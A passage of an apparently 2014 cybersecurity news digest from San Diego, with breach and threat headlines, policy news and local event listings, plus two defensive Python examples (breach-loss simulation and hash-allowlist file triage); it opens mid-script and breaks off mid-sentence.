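        "p95": s[int(0.95 * (len(s) - 1))],
        "zero_years": sum(1 for t in s if t == 0) / len(s),
    }


def run_example():
    """Constructed scenario: one breach every five years on average, median
    cost $2M per breach, heavy right tail (sigma = 1.2)."""
    return summarize(simulate_annual_losses(10_000, aro=0.2,
                                            median_loss=2_000_000, sigma=1.2))


if __name__ == "__main__":
    # Point-estimate view: $4M per event, one in five years, a $150k/yr control
    # that cuts the rate by three quarters.
    before = ale(4_000_000, 0.2)
    after = ale(4_000_000, 0.05)
    print(f"ALE before {before:,.0f}  after {after:,.0f}  ROSI {rosi(before, after, 150_000):.1f}x")
    # Distribution view of the same kind of loss.
    for k, v in run_example().items():
        print(f"{k:>10}: {v:,.2f}")
```

The mean of the simulated years lands near the ALE figure, but the median year is zero and the 95th-percentile year is several times the mean; that gap, not the mean itself, is what a budget owner needs to see before deciding between a control and a cyber-insurance premium.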
2014 FISMA reduces paperwork, codifies management structure
Agencies won’t have to complete huge three-year reports but will have to submit information on security incidents.
Week to Weak: The Weaponization of Cyber Vulnerabilities
Schneier on Security: Over 700 Million People Taking Steps to Avoid NSA Surveillance
Hired Guns: The Consultants – The Chronicle of Higher Education – more opportunities
Is there a missing generation of cyber security professionals?
Most Organizations Don’t Properly Secure Sensitive Data, Report Finds
Top 5 Data Breaches of 2014 and why “Privacy PAYS”
Counting the real cost of cyber attacks
Worried About a Data Breach? Here’s How to Respond to the Threat
Data Breaches to Continue to Plague Healthcare in 2015
The Sleeping Giant: How Wearables Will Revolutionize Healthcare
Too Much Insider Access To Critical Data Is A Growing Risk
IBM: CISOs outgunned in the cybercrime corral
Chief information security officers hard to find — and harder to keep
Infographic – Ponemon Top Enterprise Threats to Data Security AND the actual Ponemon data security report and their web page on it.. data centric security (DCS) eBook
+++ THREATs / bad news stuff / etc +++
Iran hackers may target U.S. energy, defense firms, FBI warns
The Federal Bureau of Investigation has warned U.S. businesses to be on the alert for a sophisticated Iranian hacking operation whose targets include defense contractors, energy firms and educational institutions, according to a confidential agency document. The operation is the same as one flagged last week by cyber security firm Cylance Inc as targeting critical infrastructure organizations worldwide, cyber security experts said. Cylance has said it uncovered more than 50 victims from what it dubbed Operation Cleaver, in 16 countries, including the United States.
China responsible for 85% of global phishing domains
Chinese cyber-criminals are driving an uptick in malicious domain registration and account for the vast majority of the world’s phishing attacks, according to new stats from an industry body. Chinese phishers were responsible for a massive 85% of domains registered for the sole purpose of lifting user credentials and PII, and are the main cause of “historically high levels” of malicious domain and subdomain registrations, according to the Global Phishing Survey: Trends and Domain Name Use report from the Anti-Phishing Working Group.
Worm exploits nasty Shellshock bug to commandeer network storage systems
Criminal hackers are actively exploiting the critical Shellshock vulnerability to install a self-replicating backdoor on a popular line of storage systems, researchers have warned.
Nation-backed malware targets diplomats’ iPhones, Androids, and PCs
Researchers have uncovered yet another international espionage campaign that’s so sophisticated and comprehensive that it could only have been developed with the backing of a well-resourced country. Inception, as the malware is dubbed in a report published Tuesday by Blue Coat Labs, targets devices running Windows, Android, BlackBerry, and iOS.
US Government Personnel Data May Have Been Compromised in Breach
A breach at KeyPoint Government Solutions may have left personally identifiable information about nearly 50,000 US government employees exposed to possible theft. KeyPoint conducts federal employee background checks for security clearances. The Office of Personnel Management has notified people whose information may have been compromised. This is not the first time that a company providing background checks for government employees has suffered a breach. Earlier this year, a breach at USIS exposed personally identifiable information of 25,000 people.
Office supply chain Staples Inc. today finally acknowledged that a malware intrusion this year at some of its stores resulted in a credit card breach. The company now says some 119 stores were impacted between April and September 2014, and that as many as 1.16 million customer credit and debit cards may have been stolen as a result.
Serious NTP security holes have appeared and are being exploited
A network time protocol security hole has been discovered and there are reports that exploits already exist for it and are being exploited.
TorrentLocker: Ransomware under the microscope
Selling Smartphone Security: Get Worried, Fast
Striking a balance with mobile device security
+++ SD/SoCAL security events / opportunities ++
CyberTECH events / networking / startups / etc — THE cyber happening place in SD!!! Join their Meetup Group for the latest event information! The definition of “Cyber KEWEL”
Webster University’s new SD cyber security program – check it out..
JAN
15 – OWASP – Running InfoSec for America’s Finest City.. Gary Hayslip, CISO for the city of San Diego
15 – IoT Startup Table Breakfast
28 – International Data privacy day
A – “Securing the IoT Privacy masters” by CyberTECH, SOeC, others – all day event –
B – Data Privacy Day – NCSA and Morrison & Foerster LLP – all day event –
30 – Cross Border cyber opportunities – MX/TJ and CA/SD collaboration event, all day Friday!!! (Hosted at Coleman University) – Contact me to join in… introduction email and agenda at:
31 – “BigDataDay 4 SD” all-day event SAT – free – Jump in and help us – speak and make it great for all!
WE went to the one in LA and it was great… our three tracks will be: (1) Technical = Hadoop / Hbase / NoSQL; (2) Data science = predictive analytics, parallel algorithms, statistical modeling, algorithms for data mining, etc; and (3) Applications = key use cases… Privacy by Design / data security, data start-ups / incubators, novel products. Contact me to join in… introduction email and agenda at:
FEB
8-11 – NDSS Symposium 2015
10-12 – AFCEA West – Focused on Operations in the Asia-Pacific Region
++ Future events in planning FYI:
25-26 Apr – CYBERWEST: The Southwest Cybersecurity Summit
4-12 May – SANS Security West 2015
18-21 Jul – Esri National Security summit
TBD – Provided by IEEE Cyber SIG / Various Security groups – all day – Privacy by design workshop – a cyber model & why you must be part of this initiative! (at Coleman University – AM Technical approach… PM public discussions) Help move SD forward in cyber – DOING security vs admiring the problem…. SO engage and help out on cyber 4 PbD!!!
++ Join our PbD / data security meetup, stay tuned into what’s happened.. See our over Cyber for PbD brief at AND Our more detailed technical paper on our Cyber 4 PbD approach, including an executable, proposed open privacy framework within an enterprise architecture is at (this rough draft was published in a major IEEE magazine this month):
——————————————————————————————————
DEC 7
Appeals Court to Hear Oral Arguments in Idaho Woman’s Case Against NSA Spying
EFF, ACLU Support Smith in Fighting Mass Surveillance Before Ninth Circuit
Cyber security is one of six new industries of the future
Cyber security is an industry the UK will excel at as long as it makes the necessary investment in its education and engineering base, the Institution of Engineering and Technology (IET) has argued in a new report.
In addition to cyber security, Ones to Watch lists space, new power networks, 3D printing (‘additive manufacturing’), food security, and robotics as making up the half dozen industries in which the UK is already considered a world leader. The inclusion of cyber security among these might surprise some. Security is still seen in some quarters as a short-term function, secondary to others and essentially a drain on the bottom line. The idea that it might be a competitive advantage in a world built on increasingly complex automated systems is only now starting to become apparent.
How to defend against a Sony hack
So… the usual pitch.. okay.. Better tools… “multipart” authentication (yes… better access control!).. analytics... better malware detection (a data deleting one here).. insider threat detection. Etc.. Yes… all good… yet.. No mention of THE NO. ONE issue… 10 times worse than the next worst thing *** poor cyber hygiene… causes 85+% of all security incidents… (just ask NMCI about that… :-(( And also use SCM / SIEM (monitor for bad behavior) and a little DLP too.. (how do you exfiltrate all those movies/data and not get noticed?) It is of course not about any one thing.. rather a risk prioritized, balanced and integrated security posture. Continuing to sell one capability while dismissing others does a disservice to all.
Defense Industrial Base ISAC to Launch in February 2015
The Defense Industrial Base Information Sharing and Analysis Center (DIB-ISAC) is scheduled to open in February 2015. The center will allow member organizations to share information about threats and mitigations. The DIB-ISAC will be based in Huntsville, Alabama and will support chapters all over the US. Membership fees are based on the size of the company.
The Cybersecurity Myths That Small Companies Still Believe
GSA’s short list of emerging technologies
An Alliant II RFI specifies 18 “Leading Edge Technologies” the agency is watching with interest.
New virtual assistant helps stop breaches: Personal information safeguard tool scheduled for rollout
CIOs and CISOs Can Learn From the Massive Sony Data Breach
Top Chinese hackers recruited for Google’s Project Zero team
++ Join our PbD / data security meetup, stay tuned into what’s happened..
Good Morning, San Diego! Nice aerial view of SD… quad-copter and go-pro camera
+++ Cyber Security News you can use +++
Pro-Iranian hackers have penetrated some of the world’s most sensitive networks
A sustained cyber attack campaign dubbed Operation Cleaver has compromised computer networks at several high profile organizations, including governments and companies supporting elements of critical infrastructure, over the past two years. There are 50 known compromised targets in 16 countries worldwide and it is likely that there are many more that have not been detected. For more than two years … including those operated by a US-based airline, auto maker, natural gas producer, defense contractor, and military installation, security researchers said. In many cases, “Operation Cleaver,” as the sustained hacking campaign is being dubbed, has attained the highest levels of system access of targets located in 16 countries total, according to a report published Tuesday by security firm Cylance. Compromised systems in the ongoing attacks include Active Directory domain controllers that store employee login credentials, servers running Microsoft Windows and Linux, routers, switches, and virtual private networks. With more than 50 victims that include airports, hospitals, telecommunications providers, chemical companies, and governments, the Iranian-backed hackers are reported to have extraordinary control over much of the world’s critical infrastructure.
For instance, among the targets is a company specializing in natural gas production, unclassified computers in the San Diego Navy Marine Corps Intranet (NMCI) and airlines and airports in Saudi Arabia, Pakistan and South Korea.
Obama’s pick to lead the Pentagon is big on cybersecurity
President Obama’s pick to lead the Pentagon, former deputy secretary of defense Ashton “Ash” Carter, has been a big supporter of increasing the country’s cybersecurity capabilities. His nomination signals that the administration is likely to continue to aggressively build out its ability to fight adversaries in the digital world. Carter served as the deputy secretary of defense from October 2011 to December 2013 — and before that spent two years as the Defense Department’s chief weapon and technology buyer. He first joined the Pentagon as a civilian program and technical analyst in 1981, working on missile defense.
How the Pentagon plans to bolster cloud security
The latest installment in the Defense Department’s quest to find the right blend of security and affordability in the commercial cloud came in the form of a report released by the DOD CIO’s office. The report offers “cradle-to-grave” guidance for commercial cloud providers and DOD customers, acting DOD CIO Terry Halvorsen wrote in a prefacing memo. The report, “DOD Cloud Way Forward,” is the product of a 45-day study by Halvorsen’s office, the Defense Information Systems Agency and the National Security Agency. It contains three main proposals to help DOD customers evaluate cloud security, with a central goal of cutting out unnecessary requirements for less-sensitive information and systems.
AHA to FDA: Hold med device makers responsible for cybersecurity
Medical device cybersecurity should be the responsibility of device makers, according to the American Hospital Association. In a recent letter to the U.S. Food and Drug Administration, AHA Senior Vice President of Public Policy Analysis and Development Linda Fishman called on the agency to “hold device manufacturers accountable” for ensuring the safety of medical devices from cyberthreats. The letter was in response to a request for comments published by the FDA in late September on collaborative approaches for medical device and healthcare cybersecurity.
More on Sony Pictures
Attackers Release Sensitive Data
The attackers responsible for infiltrating the Sony Pictures computer network have leaked more than 40 gigabytes of stolen data, including compensation details for top executives, and a slew of passwords for computers, social media accounts and web services. The attackers claim to have stolen more than 100 terabytes of data. Despite speculation that North Korea was involved in the attacks, a more likely scenario is that they are the result of activists or disgruntled former employees. Sony was in the midst of a changeover of chief information security officers when the company was hit with a crippling attack on its computer network..
[Note: From the wide range of data compromised, we may fairly conclude that Sony had NOT YET had the intent, design, time, or resources to apply the lessons that might have, should have, been taken from their own earlier breaches and those of others reported in 2014 but dating from months to years earlier. The rest of us have little enough time to apply those lessons. They include, but are not limited to, more compartmentation, true end to true end encryption on the enterprise network, fewer privileged users and more multi-party controls, more structured data stored only on enterprise servers, controls (Active Directory) to resist access and gratuitous copies, and timely egress and other anomaly detection and mitigation….]
The malware used in the attack against the Sony Pictures network can spread over network file shares and is capable of destroying data on Windows computers it infects. The FBI has sent confidential notifications to certain businesses, urging them to be vigilant about malware like that used in the Sony attack.
DOJ Establishing Cybersecurity Unit
The US Justice Department (DOJ) is creating a new unit in its criminal division that will be focused on fighting cyber crime. “Prosecutors from the Cybersecurity Unit will provide a central hub for expert advice and legal guidance,” according to Assistant Attorney General Leslie Caldwell.
Always good to step back and see what others recommend as the best cyber posture.. These are a couple worth reviewing and implementing, especially the third – reduce security incidents by 85% with no added resources.
DoD strategy for defending networks and data
NIST SP 800-160, Systems Security Engineering: An Integrated Approach to Building Trustworthy Resilient Systems
National campaign to improve cyber hygiene – with tool kits now
Navy’s information networks must be available, secure and capable of serving as warfighting platforms, said the head of Navy Cyber Command during a Dec. 2 event hosted by the Center for Strategic and International Studies.
Internet of Things on docket for new Congress
The incoming GOP Senate majority is likely to focus on how the government regulates the growing universe of networks and connected devices.
No More FOUO: Government Plans to Simplify Labeling of Sensitive Information
ONE comprehensive defense mobility strategy & policy
2015 Security predictions – Websense
Why don’t we just FIX what we know needs it first… quit admiring the problem and DO CYBER!
Information Security Salary Survey
Only 150 respondents, but… CISO… well over 70% made over $161,000.. and climbing..
What Does All That Healthcare Data Really Mean?
Payouts average $2.9M per cyber loss claim for large companies
DOD CISO rattled off technologies he wants to help secure an Internet of stuff.
A new DARPA program wants to throw light on the dark alleys in computer systems where Advanced Persistent Threats and other attacks hide.
Google cloud remains price leader
+++ FYI / FYSA +++
Whitelisting project helps ICS owners find suspicious files – YES, & MORE – SO DO IT!!!
Industrial control systems have been at the center of some scary security stories recently, but investigating malware infections in such environments isn’t easy because analysts often have a hard time telling good files from suspicious ones. Security researchers have identified two malware campaigns this year that targeted SCADA (supervisory control and data acquisition) systems — Havex and BlackEnergy. Such attacks are expected to grow in number, as new reports show that state-sponsored hackers are increasingly interested in critical infrastructure companies. A newly launched service called WhiteScope provides industrial control system owners and investigators with a list of good files from SCADA products and related software. The “whitelist” can be used to pin down potentially suspicious files when investigating possible compromises.
Cheap IT, dwindling maintenance leave Navy vulnerable to cyber threats
The military has plenty of cybersecurity challenges on its plate as it is trying to ward off threats from unfriendly governments, unaligned hackers and criminal syndicates. But it’s not doing itself any favors by insisting on buying the cheapest possible equipment it can find to build and defend its own networks, the Navy’s top cyber officer said Tuesday. Vice Adm. Jan Tighe, who became commander of the Navy’s Fleet Cyber Command earlier this year, said that despite pressures on the overall budget, her service needs to reexamine the calculus it has tended to use up until now when weighing costs against security within its cyber systems.
She framed the refocus as in line with official military doctrine, which now stipulates that cyberspace is truly a warfighting domain, on par with and interdependent with the old-fashioned ones: land, sea, air and space.
Hardware secured mobile devices toughen first line of defense
It’s been 10 years since the federal government introduced measures to standardize identity and credentials across all agencies. Since then, almost 5 million smart card-based Personal Identity Verification (PIV) credentials have been issued to government employees and contractors for secure access to government buildings and IT systems. Standards have also been widened for non-federal and commercial use to include millions more through Personal Identity Verification Interoperable (PIV-I) and Commercial Identity Verification (CIV) cards. Aware of the potential offered by mobile devices, the federal government is now expanding the HSPD-12 standard in the form of FIPS 201-2, which enables credentials derived from PIV to be provisioned onto mobile devices so users can access applications and networks securely, quickly and easily.
Commerce takes bigger oversight role in its bureaus’ cybersecurity
For the first time ever, the Commerce Department is building a real-time view of its overall cybersecurity posture. And with that information, it’s taking on a greater oversight role over the 14 different agencies within its purview. Commerce officials emphasized that the establishment of a new Enterprise Security Oversight Center (ESOC) is not meant to be a takeover of the IT functions that have traditionally been managed by bureaus with disparate missions, ranging from the Census Bureau to the National Weather Service to the Patent and Trademark Office. Rather, it’s a recognition that the push toward continuous diagnostics and mitigation in the government only works if everyone’s sharing information – and if each agency is on basically the same cybersecurity footing.
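The ICS whitelisting item above (WhiteScope) comes down to one investigative step: hash what is on the host and compare it against a list of known-good vendor files, so the analyst only has to look at what is left over. Here is an added example of that triage step in Python; it is not WhiteScope’s code or data. The vendor allowlist, the file names (hmi_runtime.dll, plc_driver.sys, updater.exe) and the sample host directory are all constructed inline so it runs offline; a real investigation would feed it the vendor’s published hashes and a copy of the host’s file system.

```python
"""Triage files on an ICS host against a known-good hash allowlist.

Added example, not WhiteScope's own code or data: the vendor allowlist
and the sample host directory are constructed inline so it runs offline.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 so large binaries don't load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def triage(root: Path, allowlist: dict) -> dict:
    """Bucket every regular file under root.

    allowlist maps a SHA-256 hex digest to the vendor file name it belongs to.
    Buckets:
      known          - hash matches a vendor file: skip it
      name_collision - name matches a vendor file but the hash does not:
                       a replaced or patched vendor binary, look here first
      unknown        - neither name nor hash is on the list: needs a look
    Paths are returned relative to root, POSIX style, sorted.
    """
    known_names = set(allowlist.values())
    buckets = {"known": [], "name_collision": [], "unknown": []}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if sha256_of(path) in allowlist:
            buckets["known"].append(rel)
        elif path.name in known_names:
            buckets["name_collision"].append(rel)
        else:
            buckets["unknown"].append(rel)
    return buckets


def build_demo_host() -> tuple:
    """Constructed sample: two hypothetical vendor files, then a host tree
    holding one clean copy, one altered copy, and one file the vendor never shipped."""
    vendor_files = {
        "hmi_runtime.dll": b"vendor runtime build 4.2\n",
        "plc_driver.sys": b"vendor driver build 1.9\n",
    }
    allowlist = {hashlib.sha256(data).hexdigest(): name
                 for name, data in vendor_files.items()}
    root = Path(tempfile.mkdtemp(prefix="ics_triage_"))
    (root / "bin").mkdir()
    (root / "bin" / "hmi_runtime.dll").write_bytes(vendor_files["hmi_runtime.dll"])
    # Same name as the vendor driver, but the bytes differ.
    (root / "bin" / "plc_driver.sys").write_bytes(vendor_files["plc_driver.sys"] + b"patched\n")
    (root / "bin" / "updater.exe").write_bytes(b"not a vendor file\n")
    return root, allowlist


def demo() -> dict:
    """Run the triage over the constructed host and return the buckets."""
    root, allowlist = build_demo_host()
    return triage(root, allowlist)


if __name__ == "__main__":
    for bucket, files in demo().items():
        print(f"{bucket}: {files}")
```

The name-collision bucket is the one worth separating out: a file that carries a vendor name but not a vendor hash is exactly the trojanised-binary case the campaigns in the item above used, whereas a wholly unknown file may just be a local tool. Matching is by hash only; the file name is used solely to decide which bucket a non-matching file lands in.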
Thoughts on NIST Draft Guide to Cyber Threat Information Sharing (SP 800-150)
Leveraging The Kill Chain For Awesome
There are good reasons why the Kill Chain is being used by some of the most successful information security teams around. Here are three.
Why We Need Better Cyber Security: A Graphical Snapshot
By 2022, demand for security industry professionals will grow 37%. Also a great crime statistic infographic
The Real Cost of Cyber Incidents, According To Insurers
Healthcare is hit by the most malicious insiders and the highest legal costs, according to a NetDiligence report. In August, the Ponemon Institute reported that security exploits and data breaches had cost survey respondents (some of which experienced multiple incidents), on average, $9.4 million over a year. Yet, according to research released today by NetDiligence, the average payout of a cyber insurance claim is only $733,109. full report
DISA takes on defense of DOD networks
The initiative will create a Joint Force Headquarters for DOD Information Networks
POS Security Essentials: How to minimize Payment Card Breaches
Not Just the NSA: Privacy Breaches Closer to Home – In Short: Negligence and Privacy
Destructive Cyber Attacks on the Rise
The Millennium Falcon And Breach Responsibility
DoD To Silicon Valley, VCs: How ‘Bout Some Help!
Hiring R2D2 to Protect Your Mall or Campus, All for $6.25 Per Hour
Stopping Zero-Day Attacks With Secure Configuration Management (SCM / SIEM is essential – got one?)
Cyber liability: how can businesses protect themselves against underestimated cyber risks?
Penetration Testing: 5 Common Myths Explained
Advanced Cyber Defense Methods – eBook
The actual cost of failed trust..
4th annual benchmark study on Patient Privacy and Data Security.
2014 Privileged use abuse and insider threat
State of endpoint RISK
+++ THREATs / bad news stuff / etc +++
SSH and Next-generation vulnerabilities
Computing goes to the cloud. So does crime.
As more of our world, from family photos to financial information, moves into the cloud, malicious hackers are following. It is easy to see why: Cloud computing systems contain lots of critical information, from sensitive corporate and personal financial data to government secrets and even nude photographs never meant to be shared. All of it has been targeted by hackers, and in many cases stolen. In 2009, a password-stealing “botnet,” or collection of malevolent software, was found inside Amazon Web Services, perhaps the world’s largest cloud-computing system. More recently, celebrities’ private photos were stolen from Apple’s iCloud storage system. IBM says its researchers regularly receive taunts from Russian hackers who leave them mocking messages in software aimed at stealing from the 300 banks IBM serves.
China, a fish barrel for cybercriminals
In China, some of the most successful cyberthreats are frighteningly simple. One recent viral mobile message offered free Golden Retriever puppies to lure users into giving away personal information. Another online scam took thousands from a woman who wired money to an impostor she thought was her son’s teacher. A current favorite of Chinese cybercriminals, according to Pei Zhiyong, the senior security researcher of the antivirus company Qihoo 360 Technology, is to simply program malicious code that asks users to disable their antivirus software. “It will say their security program is incompatible with whatever they’re trying to do,” he said. “We call it a ‘Candy Trojan Horse,’ and 30 percent of users will actually respond by turning off their antivirus system.”
FBI warns of ‘destructive’ malware in wake of Sony attack
The Federal Bureau of Investigation warned U.S. businesses that hackers have used malicious software to launch a destructive cyberattack in the United States, following a devastating breach last week at Sony Pictures Entertainment.
Cybersecurity experts said the malicious software described in the alert appeared to describe the one that affected Sony, which would mark the first major destructive cyber attack waged against a company on U.S. soil. Such attacks have been launched in Asia and the Middle East, but none have been reported in the United States. The FBI report did not say how many companies had been victims of destructive attacks.
Malware Targets Password Managers
Mobiles to be among top targets of hackers in 2015
Tor secret comms – blocking reduces bank account takeover.
A new report from the U.S. Treasury Department found that a majority of bank account takeovers by cyberthieves over the past decade might have been thwarted had affected institutions known to look for and block transactions coming through Tor, a global communications network that helps users maintain anonymity by obfuscating their true location online.
Most U.S. Companies Under Cyberattack
Browser vulnerabilities are the most pressing security issue, study finds.
New POS Malware Discovered Just in Time for the Holiday Shopping Season
+++ SD/SoCAL security events / opportunities ++
CyberTECH events / networking / startups / etc — THE cyber happening place in SD!!! Join their Meetup Group for the latest event information! The definition of “Cyber KEWEL”
Webster University’s new SD cyber security program – check it out..
DEC
16 – ISSA Annual elections and BIG prize raffle!! AND Ira Winkler, President ISSA International
18 – ISACA chapter meeting – (FREE!) Leveraging a Strong IT Audit and Information Security Partnership… BY Alex Branisteanu, Director Information Security, Scripps Health.. NEW LOCATION – Coleman University.
JAN
15 – OWASP – Running InfoSec for America’s Finest City.. Gary Hayslip, CISO for the city of San Diego
28 – International Data privacy day – all day event – “Securing the IoT Privacy masters” (CyberTECH, SOeC, others)
30 – Cross Border cyber opportunities – MX/TJ and CA/SD collaboration event, all day Friday!!! (Hosted at Coleman University) – Contact me to join in…
31 Jan – Tentative – Started planning “BigDataDay 4 SD” all-day event – free – Jump in and help us! WE went to the one in LA and it was great… likely our three tracks will be: (1) Technical = Hadoop / Hbase / NoSQL; (2) Data science = predictive analytics, parallel algorithms, statistical modeling, algorithms for data mining, etc; and (3) Applications = key use cases… Privacy by Design / data security, data start-ups / incubators, novel products.
++ Future events in planning FYI:
TBD – Provided by IEEE Cyber SIG / Various Security groups – all day – Privacy by design workshop – a cyber model & why you must be part of this initiative! (at Coleman University – AM Technical approach… PM public discussions) Help move SD forward in cyber – DOING security vs admiring the problem…. SO engage and help out on cyber 4 PbD!!!
++ Join our PbD / data security meetup, stay tuned into what’s happened.. See our over Cyber for PbD brief at AND Our more detailed technical paper on our Cyber 4 PbD approach, including an executable, proposed open privacy framework within an enterprise architecture is at (this rough draft is also getting ready to be published in a major IEEE magazine in Jan 2014):
—————————————————————————–
DEC 2
The 10 Most Profitable Industries According To Big Data
Security performance of S&P 500 companies in four key industry sectors: Finance, Utilities, Retail and Healthcare
Government types – Updated SPAWAR Acquisition Forecast can be found at
10 top security threats of 2014 (so far)
The top security threats of 2014 include equal parts old mistakes, new adversaries, innocent human nature and the evils that people do. For 2015.. more of the same… poor cyber hygiene (poor patching, weak procedures, etc), weak access control (not enforcing least privilege), as always – people / users, applications w/o security, retailers’ lax security controls, Android security, IoT, et al..
Websense 2015 Security Predictions Report
Top 100+ Cyber Security Blogs & Infosec Resources
SANS 2014 Security Analytics & Intelligence Survey
Good overview of security and data…
Infographic of 200+ Startup Resources in San Diego
Very useful list of URL web site addresses supporting the SBIR/STTR program
Forms, audit, OCI, grants, etc…
+++ Cyber Security News you can use ++
FedRAMP developing a FISMA high baseline in 2015
Demand is finally pushing the cloud services cybersecurity program known as FedRAMP to develop standards for high impact systems. The Federal Risk and Authorization Management Program will send a draft baseline standard for FISMA high systems around the government for comment in the next month. Matt Goodrich, the acting director of the FedRAMP program, said the program management office then will submit the draft baseline to industry for comment before finalizing it in 2015.
Newly revealed cyber espionage attack ‘more complex’ than Stuxnet, Flame & now Regin
First there was Stuxnet and Flame, and now there’s an even more sophisticated, stealthy, and powerful cyber espionage attack called Regin that dates back as far as 2003 and has been found infecting machines in more than a dozen countries. Symantec and Kaspersky Lab have each published their separate findings on Regin, a modular malware platform that has targeted Windows machines in telecommunications operators, governments, financial institutions, researchers, small businesses, and individuals associated with cryptography research.
What we know about ‘Regin,’ the powerful malware that could be the work of NSA
AND NSA director: “Totally defensive” a losing strategy
Although there are no established principles for norms in cyberspace, such as what qualifies as an “act of war,” the idea that nations should refrain from offensive action and operate day-to-day completely on the defensive is not acceptable to the U.S. military, said Vice Adm. Mike Rogers, the dual-hatted head of the National Security Agency and Cyber Command. “Being totally on the defensive is a very losing strategy to me. It will cost a significant amount of money. It leads to a much decreased probability of mission success. That’s just not a good outcome for us in the long run,” said Rogers during a Nov. 20 hearing before the House Intelligence Committee.
A tool to know if you’re being watched
Want to know if someone is spying on your computer? A coalition of privacy and civil liberties groups this week released a free tool, dubbed Detekt, that searches for surveillance spyware on your computer. The spyware might be collecting emails, listening to Skype video calls, observing through a computer camera, or even monitoring keystrokes to determine passwords and Internet activity. Designed for journalists and human rights organizations – the subject of intense government scrutiny in many countries – the tool works for anyone with a Windows computer.
As cyberthreats increase, big money chases patches
The year since hackers broke into Target and accessed millions of credit and debit card numbers has been a brutal one for cyberattacks. Next year’s threat forecast doesn’t look any better. But for cybersecurity firms and companies offering cyber-insurance, the year has been great. Business is booming and stock prices are shooting upward. Security start-ups are also getting a massive boost in funding.
The hackers that infiltrated Target’s point-of-sale terminals sometime before Black Friday last year were able to steal as many as 70 million credit and debit card records. That, it turns out, was just the beginning. Twenty major U.S. retailers have been breached so far this year, according to data from the security benchmarking company BitSight.
Security Checklists Useful as Part of Larger Strategy
Lists of top vulnerabilities to look for and address are helpful, but only when used as part of a larger overall strategy. Each organization needs to use the list to complement its own risk assessment practices.
NIST – Guide to Cyber threat information sharing
Some great info in areas. ExSumm overview points; 2.2 – challenges; 2.3 – cyber kill chain; 2.7 – recommendations.. and most of Section three, especially 3.4, self-assessment. Appendix D is great – lots of good resources and links!
The catastrophic state of security in 2014
Pretty good / sometimes humorous looks at four key problem areas… (don’t agree with some)
Why We Need Better Cyber Security: A Graphical Snapshot
By 2022, demand for security industry professionals will grow 37%. Some great statistics too..
DLP remains high on the list of cybersecurity policies
Data loss prevention (DLP) has been a part of Internet security almost as long as the Internet has existed. Sometimes, though, it seems like old hat, a not very cool older uncle that is irrelevant in the face of other, sexier security solutions. But as recent high-profile events have shown, it still needs to be the focus for most organizations.
How the Pentagon plans to bolster cloud security
A new report from the DOD CIO offers soup-to-nuts guidance on security for commercial cloud providers and Defense Department customers.
Network Security Needs Big Data | ZTM (zero trust model)
A computer-vision algorithm that can describe photos
NSA Technology Transfer Program / Catalog
Applying the 20 Critical Security Controls to the Internet of Things (IoT).. Good mapping..
Short-Range Low Power Wireless Devices and Internet of Things (IoT)
and The Dark Side Of Wearable Tech: Should You Be Worried?
17 New Trends in Big Data and Data Science
+++ FYI / FYSA +++
Speeding up breach detection
On average, organizations take 229 days to detect a data breach, according to a recent study from the online security firm FireEye. One reason for the lengthy detection time is two-thirds of organizations are told about a breach by a third party, rather than discovering it themselves, says Dave Merkel, Chief Technology Officer at FireEye. “It’s the FBI showing up with your ‘wallet,’” he says. “Or even worse, your customer shows up [to tell you about a breach].” Organizations looking to speed up breach detection on their own, rather than relying on others, need to improve their data analytics capabilities, prioritize the type of data they want to collect and analyze, and ensure they have the appropriate staff who can take the time to review the data for suspicious activity.
U.N. urges protection of privacy in digital era
The United Nations adopted a resolution on Tuesday urging all countries to protect the right to privacy in digital communications and to offer their citizens a way to seek “remedy” if their privacy is violated. Though not legally binding, the resolution signaled growing international attention to the issue of digital privacy, which it described as a human right. The measure passed by consensus in the General Assembly’s human rights committee, which meant that it was not put up for a vote. But it was a result of intense closed-door negotiations, and it set the stage for a showdown in Geneva next spring, when the issue is expected to go to the Human Rights Council. Privacy advocates are pushing for the United Nations to establish a special envoy.
Derived credentials to roll out across DoD by July 2015 Personnel in the Department of Defense Office of the Chief Information Officer are piloting the use ofderived credentials to send secure emails on their mobile devices without having to go through the added steps of plugging in an authorized common access card (CAC), a system that could be rolled out across the component agencies by this summer. Placing credentials on a user’s mobile device – derived from their CAC – enables use of authorized personal identity verification (PIV) for secure communications without forcing the user to plug in a sled (extraneous device) to read their CAC. Symantec uncovers sophisticated, stealthy computer spying tool Computer security researchers at Symantec say they have discovered a sophisticated piece of malware circulating the world that appears to be used for spying at Internet service and telecommunications companies, and was likely created by a government agency. And while its origin is unclear, a short list of capable countries would include the U.S., Israel and China. The research, published today, comes from the same team at Symantec thatfour years ago helped discover and ferret out the capabilities of Stuxnet, the world’s first digital weapon. It is believed to have been created by the combined efforts of the U.S. and Israel and used to sabotage the Iranian nuclear research program. NIST Weighs Pros and Cons of Cyberattack Data Sharing To facilitate more and faster information sharing around cyberattacks, the National Institute for Standards and Technology (NIST) released a draft document Monday outlining some best practices. NIST – Guide to Cyber threat information sharing – Solid ExSumm overview points .. 2.2 – challenges.. 2.3 – cyber kill chain… 2.7 – recommendations and most of Section three, especially 3.4, self-assessment… Appendix D is great – lots of good resources and links! 
The Week When Attackers Started Winning The War On Trust The misuse of keys and certificates is not exotic or hypothetical. It’s a real threat that could undermine most, if not all, critical security controls, asrecent headlines strongly show. Cybersecurity, the Internet of Things, and the Role of Government The top cloud computing threats and vulnerabilities in an enterprise environment Testing the Security of Smart Devices with the OWASP Top Ten GAO Report on VA Information Security Liberty Mutual Offers Cyber Insurance Coverage for Small, Mid-Sized Businesses Digital Storage And The Internet Of Things NSA Releases New Data-Flow Software to the Open Source Community Cyber Defense Plan of USAF 10 hottest IT skills for 2015 The Ten Commandments of Counterintelligence Amazon embraces docker Deconstructing the Cyber Kill Chain Private Cloud Security Considerations Guide.. Five great browser add-ins to protect your privacy +++ THREATs / bad news stuff / etc ++ Now e-cigarettes can give you malware E-cigarettes may be better for your health than normal ones, but spare a thought for your poorcomputer – electronic cigarettes have become the latest vector for malicious software, according to online reports. Many e-cigarettes can be charged over USB, either with a special cable, or by plugging the cigarette itself directly into a USB port. That might be a USB port plugged into a wall socket or the port on a computer – but, if so, that means that a cheap e-cigarette from an untrustworthy supplier gains physical access to a device. Docker security flaw found The Docker Linux container format has a major exposure that could allow malicious code to assume unassigned privileges with the host server and order the extraction of 